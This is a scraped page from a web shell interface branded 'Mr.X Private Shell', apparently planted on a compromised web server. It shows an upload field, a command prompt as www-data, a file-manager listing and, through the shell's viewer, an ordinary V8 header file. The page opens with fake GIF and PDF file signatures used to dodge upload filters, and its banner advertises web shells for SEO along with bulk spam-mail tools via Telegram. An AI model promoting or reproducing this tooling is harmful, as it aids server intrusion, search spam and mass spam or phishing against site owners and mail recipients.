GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
// Copyright 2021 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef INCLUDE_V8_MICROTASKS_QUEUE_H_
#define INCLUDE_V8_MICROTASKS_QUEUE_H_

#include <stddef.h>

#include <memory>

#include "v8-local-handle.h"  // NOLINT(build/include_directory)
#include "v8-microtask.h"     // NOLINT(build/include_directory)
#include "v8config.h"         // NOLINT(build/include_directory)

namespace v8 {

class Function;

namespace internal {
class Isolate;
class MicrotaskQueue;
}  // namespace internal

/**
 * Represents the microtask queue, where microtasks are stored and processed.
 * https://html.spec.whatwg.org/multipage/webappapis.html#microtask-queue
 * https://html.spec.whatwg.org/multipage/webappapis.html#enqueuejob(queuename,-job,-arguments)
 * https://html.spec.whatwg.org/multipage/webappapis.html#perform-a-microtask-checkpoint
 *
 * A MicrotaskQueue instance may be associated to multiple Contexts by passing
 * it to Context::New(), and they can be detached by Context::DetachGlobal().
 * The embedder must keep the MicrotaskQueue instance alive until all associated
 * Contexts are gone or detached.
 *
 * Use the same instance of MicrotaskQueue for all Contexts that may access each
 * other synchronously. E.g. for Web embedding, use the same instance for all
 * origins that share the same URL scheme and eTLD+1.
 */
class V8_EXPORT MicrotaskQueue {
 public:
  /**
   * Creates an empty MicrotaskQueue instance.
   */
  static std::unique_ptr<MicrotaskQueue> New(
      Isolate* isolate, MicrotasksPolicy policy = MicrotasksPolicy::kAuto);

  virtual ~MicrotaskQueue() = default;

  /**
   * Enqueues the callback to the queue.
   */
  virtual void EnqueueMicrotask(Isolate* isolate,
                                Local<Function> microtask) = 0;

  /**
   * Enqueues the callback to the queue.
   */
  virtual void EnqueueMicrotask(v8::Isolate* isolate,
                                MicrotaskCallback callback,
                                void* data = nullptr) = 0;

  /**
   * Adds a callback to notify the embedder after microtasks were run. The
   * callback is triggered by explicit RunMicrotasks call or automatic
   * microtasks execution (see Isolate::SetMicrotasksPolicy).
   *
   * Callback will trigger even if microtasks were attempted to run,
   * but the microtasks queue was empty and no single microtask was actually
   * executed.
   *
   * Executing scripts inside the callback will not re-trigger microtasks and
   * the callback.
   */
  virtual void AddMicrotasksCompletedCallback(
      MicrotasksCompletedCallbackWithData callback, void* data = nullptr) = 0;

  /**
   * Removes callback that was installed by AddMicrotasksCompletedCallback.
   */
  virtual void RemoveMicrotasksCompletedCallback(
      MicrotasksCompletedCallbackWithData callback, void* data = nullptr) = 0;

  /**
   * Runs microtasks if no microtask is running on this MicrotaskQueue instance.
   */
  virtual void PerformCheckpoint(Isolate* isolate) = 0;

  /**
   * Returns true if a microtask is running on this MicrotaskQueue instance.
   */
  virtual bool IsRunningMicrotasks() const = 0;

  /**
   * Returns the current depth of nested MicrotasksScope that has
   * kRunMicrotasks.
   */
  virtual int GetMicrotasksScopeDepth() const = 0;

  MicrotaskQueue(const MicrotaskQueue&) = delete;
  MicrotaskQueue& operator=(const MicrotaskQueue&) = delete;

 private:
  friend class internal::MicrotaskQueue;
  MicrotaskQueue() = default;
};

/**
 * This scope is used to control microtasks when MicrotasksPolicy::kScoped
 * is used on Isolate. In this mode every non-primitive call to V8 should be
 * done inside some MicrotasksScope.
 * Microtasks are executed when topmost MicrotasksScope marked as kRunMicrotasks
 * exits.
 * kDoNotRunMicrotasks should be used to annotate calls not intended to trigger
 * microtasks.
 */
class V8_EXPORT V8_NODISCARD MicrotasksScope {
 public:
  enum Type { kRunMicrotasks, kDoNotRunMicrotasks };

  V8_DEPRECATE_SOON(
      "May be incorrect if context was created with non-default microtask "
      "queue")
  MicrotasksScope(Isolate* isolate, Type type);

  MicrotasksScope(Local<Context> context, Type type);
  MicrotasksScope(Isolate* isolate, MicrotaskQueue* microtask_queue, Type type);
  ~MicrotasksScope();

  /**
   * Runs microtasks if no kRunMicrotasks scope is currently active.
   */
  static void PerformCheckpoint(Isolate* isolate);

  /**
   * Returns current depth of nested kRunMicrotasks scopes.
   */
  static int GetCurrentDepth(Isolate* isolate);

  /**
   * Returns true while microtasks are being executed.
   */
  static bool IsRunningMicrotasks(Isolate* isolate);

  // Prevent copying.
  MicrotasksScope(const MicrotasksScope&) = delete;
  MicrotasksScope& operator=(const MicrotasksScope&) = delete;

 private:
  internal::Isolate* const i_isolate_;
  internal::MicrotaskQueue* const microtask_queue_;
  bool run_;
};

}  // namespace v8

#endif  // INCLUDE_V8_MICROTASKS_QUEUE_H_

Filemanager

Name Type Size Permission Actions
cppgc Folder 0755
libplatform Folder 0755
openssl Folder 0755
uv Folder 0755
common.gypi File 26.59 KB 0644
config.gypi File 32.08 KB 0644
js_native_api.h File 31.64 KB 0644
js_native_api_types.h File 6.87 KB 0644
node.h File 67.99 KB 0644
node_api.h File 10.34 KB 0644
node_api_types.h File 1.57 KB 0644
node_buffer.h File 3.6 KB 0644
node_object_wrap.h File 3.78 KB 0644
node_version.h File 4.14 KB 0644
uv.h File 71.1 KB 0644
v8-array-buffer.h File 17.89 KB 0644
v8-callbacks.h File 16.59 KB 0644
v8-container.h File 5.82 KB 0644
v8-context.h File 17.76 KB 0644
v8-cppgc.h File 7.46 KB 0644
v8-data.h File 1.58 KB 0644
v8-date.h File 1.19 KB 0644
v8-debug.h File 5.04 KB 0644
v8-embedder-heap.h File 2.71 KB 0644
v8-embedder-state-scope.h File 1.46 KB 0644
v8-exception.h File 7.41 KB 0644
v8-extension.h File 1.83 KB 0644
v8-external.h File 924 B 0644
v8-forward.h File 1.65 KB 0644
v8-function-callback.h File 19.19 KB 0644
v8-function.h File 4.42 KB 0644
v8-handle-base.h File 4.3 KB 0644
v8-initialization.h File 10.23 KB 0644
v8-internal.h File 57.22 KB 0644
v8-isolate.h File 63.38 KB 0644
v8-json.h File 1.32 KB 0644
v8-local-handle.h File 23.6 KB 0644
v8-locker.h File 3.86 KB 0644
v8-maybe.h File 4.47 KB 0644
v8-memory-span.h File 6.27 KB 0644
v8-message.h File 7.24 KB 0644
v8-microtask-queue.h File 4.95 KB 0644
v8-microtask.h File 861 B 0644
v8-object.h File 29.55 KB 0644
v8-persistent-handle.h File 17.81 KB 0644
v8-platform.h File 47.9 KB 0644
v8-primitive-object.h File 2.53 KB 0644
v8-primitive.h File 27.69 KB 0644
v8-profiler.h File 41.11 KB 0644
v8-promise.h File 5.17 KB 0644
v8-proxy.h File 1.23 KB 0644
v8-regexp.h File 3.1 KB 0644
v8-script.h File 30.59 KB 0644
v8-snapshot.h File 10.15 KB 0644
v8-source-location.h File 2.54 KB 0644
v8-statistics.h File 7.45 KB 0644
v8-template.h File 50.36 KB 0644
v8-traced-handle.h File 12.4 KB 0644
v8-typed-array.h File 11.3 KB 0644
v8-unwinder.h File 4.64 KB 0644
v8-value-serializer.h File 10.56 KB 0644
v8-value.h File 16.71 KB 0644
v8-version.h File 773 B 0644
v8-wasm.h File 6 KB 0644
v8-weak-callback-info.h File 2.41 KB 0644
v8.h File 3.69 KB 0644
v8config.h File 32.85 KB 0644
zconf.h File 16.6 KB 0644
zlib.h File 95.17 KB 0644